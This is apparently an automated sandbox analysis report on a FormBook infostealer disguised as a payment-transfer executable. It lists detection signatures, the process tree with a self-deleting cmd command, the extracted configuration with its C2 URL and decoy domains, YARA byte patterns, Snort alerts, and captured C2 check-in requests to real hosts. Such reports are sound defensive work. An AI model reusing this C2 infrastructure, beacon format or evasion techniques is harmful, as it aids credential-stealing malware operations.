Loading ...

Play interactive tourEdit tour

Analysis Report Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

Overview

General Information

Sample Name:Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
Analysis ID:356535
MD5:5f1c9c4a7bc24c3d39a5a3834ba7bb8e
SHA1:0e9a21a75675c636438f50d90bb5f7ec9a689275
SHA256:5d5d64a87a5d888443e8d7a25046922fa4a39fe5952a45635dd66321e616bb14
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Payment Transfer Copy of $274,876.00 for the invoice shipments.exe (PID: 6512 cmdline: 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe' MD5: 5F1C9C4A7BC24C3D39A5A3834BA7BB8E)
    • Payment Transfer Copy of $274,876.00 for the invoice shipments.exe (PID: 6840 cmdline: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe MD5: 5F1C9C4A7BC24C3D39A5A3834BA7BB8E)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 6224 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 4188 cmdline: /c del 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.jaemagreci.com/blr/"], "decoy": ["cvmjqcid.com", "cubskw.com", "carbeloy.com", "lucascolterneal.com", "robertlainstrom.com", "long9000.com", "drtconseils.com", "keptus.com", "mediamonkeyhouse.com", "outletmihotel.com", "exchangemailboxrepair.com", "kanaai.com", "mountshastajerky.com", "thepettybox.com", "sweetpopntreatz.com", "wpweasel.com", "plumbersinauckland.com", "sevdaduragi.com", "gesunde-ordnung.com", "10751wilshire801.com", "brandmkttx.net", "yoshiyama-potager.com", "na230.com", "kittyninja.net", "eurythmy.net", "circlecitydesign.com", "thesleepinn.com", "olgadalila.com", "happyaiper.com", "supplierdurian.site", "simplymcs.com", "ug-storecards.com", "gannahealing.com", "ginamoney.com", "emilyadkinsonrealtor.com", "tablatiffin.com", "laughinggrassfarm.com", "thebriartowns.com", "youplus.website", "soheilvaseghi.com", "prodhealth.site", "bltck.com", "zomapa.com", "hcssgy.com", "simplyloveoccasions.com", "mdglitzallstars.com", "rck.xyz", "stanchilo.com", "avadl.pro", "astursuites.com", "whowetrust.com", "easpipe.com", "ortopediagalvao.com", "wellhealt.com", "destinyhouseacton.com", "lazyturtletikibar.com", "online-verifieren.net", "jasa-software.com", "tenager365.com", "atgiven.icu", "recette-originale.com", "danielleandnic.com", "kathrynbaierling.com", "emmaxbellecandleco.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x13b3b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13b632:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x1679d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x167c52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x147155:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x173775:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x146c41:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x173261:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147257:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x173877:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1473cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x1739ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x13c04a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x16866a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x145ebc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x1724dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x13cd43:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x169363:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x14cdf7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x179417:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x14ddfa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 8 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.jaemagreci.com/blr/"], "decoy": ["cvmjqcid.com", "cubskw.com", "carbeloy.com", "lucascolterneal.com", "robertlainstrom.com", "long9000.com", "drtconseils.com", "keptus.com", "mediamonkeyhouse.com", "outletmihotel.com", "exchangemailboxrepair.com", "kanaai.com", "mountshastajerky.com", "thepettybox.com", "sweetpopntreatz.com", "wpweasel.com", "plumbersinauckland.com", "sevdaduragi.com", "gesunde-ordnung.com", "10751wilshire801.com", "brandmkttx.net", "yoshiyama-potager.com", "na230.com", "kittyninja.net", "eurythmy.net", "circlecitydesign.com", "thesleepinn.com", "olgadalila.com", "happyaiper.com", "supplierdurian.site", "simplymcs.com", "ug-storecards.com", "gannahealing.com", "ginamoney.com", "emilyadkinsonrealtor.com", "tablatiffin.com", "laughinggrassfarm.com", "thebriartowns.com", "youplus.website", "soheilvaseghi.com", "prodhealth.site", "bltck.com", "zomapa.com", "hcssgy.com", "simplyloveoccasions.com", "mdglitzallstars.com", "rck.xyz", "stanchilo.com", "avadl.pro", "astursuites.com", "whowetrust.com", "easpipe.com", "ortopediagalvao.com", "wellhealt.com", "destinyhouseacton.com", "lazyturtletikibar.com", "online-verifieren.net", "jasa-software.com", "tenager365.com", "atgiven.icu", "recette-originale.com", "danielleandnic.com", "kathrynbaierling.com", "emmaxbellecandleco.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exeVirustotal: Detection: 25%Perma Link
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exeReversingLabs: Detection: 27%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exeJoe Sandbox ML: detected
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: explorer.pdbUGP source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275056959.00000000010DF000.00000040.00000001.sdmp, explorer.exe, 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, explorer.exe
          Source: Binary string: explorer.pdb source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 50.116.112.43:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 50.116.112.43:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 50.116.112.43:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 185.199.108.153:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 185.199.108.153:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 185.199.108.153:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 176.74.27.137:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 176.74.27.137:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 176.74.27.137:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 164.155.144.220:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 164.155.144.220:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 164.155.144.220:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.jaemagreci.com/blr/
          Source: global trafficHTTP traffic detected: GET /blr/?OhNhA=0qfhgAUhFNnGzH7qGfzqggPFhGYeFRXNcWm+JLPBUuQl5doqjpchYq6utkLPlNOTiwpN&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.kanaai.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /blr/?OhNhA=zy4aJG0RjbOs5fr8AigFVw38GRzAFltiV345BgDRTDlQ98Z37kqPuyHkyXsUwHWJOif+&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.cvmjqcid.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /blr/?OhNhA=iTLpEvItJY3C/iY0O/gMWVvFAW67iqJR4Qa3Cv5AKoajJvRVMc3YtK32u24rykRgHJga&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.jaemagreci.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /blr/?OhNhA=BbRt519gnWT2xWYUVSCsYiPJyU2bwfntJXr00JvtFds5dVCPZN8W3I64QGhm0Na3rvFo&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.sweetpopntreatz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /blr/?OhNhA=luzvcdoWPFwNnK5D3r055oflJ4B6PNqet6SFuGGCnSWn2ee+CnvcD8UF6pdBh9++nOVu&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.long9000.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /blr/?OhNhA=9NQu4cm/N7DYOvYkOtDGizwfZS7YZZztEmXWW7fOjfXAYFPuQogNr8p6dLx09NPCIIrz&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.soheilvaseghi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /blr/?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixs7jAbMlvm1ymY&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.gannahealing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /blr/?OhNhA=Y4Nqpa2r+tF7um99WXv6gSEpOHOatsVE8QqSeJqkcp8K3U81YoxyR3xnMLz5lVrsAPpR&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.olgadalila.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /blr/?OhNhA=bjCfXUMydIGN0g8/5RwnbPPnLj5Or6e3tcQCgNEOQF7zRRnTIveAFITP4tBGYavfcP94&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.zomapa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 35.246.6.109 35.246.6.109
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: IDCFIDCFrontierIncJP IDCFIDCFrontierIncJP
          Source: Joe Sandbox ViewASN Name: MULTA-ASN1US MULTA-ASN1US
          Source: global trafficHTTP traffic detected: GET /blr/?OhNhA=0qfhgAUhFNnGzH7qGfzqggPFhGYeFRXNcWm+JLPBUuQl5doqjpchYq6utkLPlNOTiwpN&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.kanaai.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /blr/?OhNhA=zy4aJG0RjbOs5fr8AigFVw38GRzAFltiV345BgDRTDlQ98Z37kqPuyHkyXsUwHWJOif+&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.cvmjqcid.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /blr/?OhNhA=iTLpEvItJY3C/iY0O/gMWVvFAW67iqJR4Qa3Cv5AKoajJvRVMc3YtK32u24rykRgHJga&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.jaemagreci.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /blr/?OhNhA=BbRt519gnWT2xWYUVSCsYiPJyU2bwfntJXr00JvtFds5dVCPZN8W3I64QGhm0Na3rvFo&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.sweetpopntreatz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /blr/?OhNhA=luzvcdoWPFwNnK5D3r055oflJ4B6PNqet6SFuGGCnSWn2ee+CnvcD8UF6pdBh9++nOVu&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.long9000.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /blr/?OhNhA=9NQu4cm/N7DYOvYkOtDGizwfZS7YZZztEmXWW7fOjfXAYFPuQogNr8p6dLx09NPCIIrz&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.soheilvaseghi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /blr/?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixs7jAbMlvm1ymY&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.gannahealing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /blr/?OhNhA=Y4Nqpa2r+tF7um99WXv6gSEpOHOatsVE8QqSeJqkcp8K3U81YoxyR3xnMLz5lVrsAPpR&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.olgadalila.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /blr/?OhNhA=bjCfXUMydIGN0g8/5RwnbPPnLj5Or6e3tcQCgNEOQF7zRRnTIveAFITP4tBGYavfcP94&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.zomapa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.kanaai.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Feb 2021 08:44:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 31 63 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 2e 73 75 62 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a
          Source: explorer.exe, 00000005.00000002.754895939.0000000004E61000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
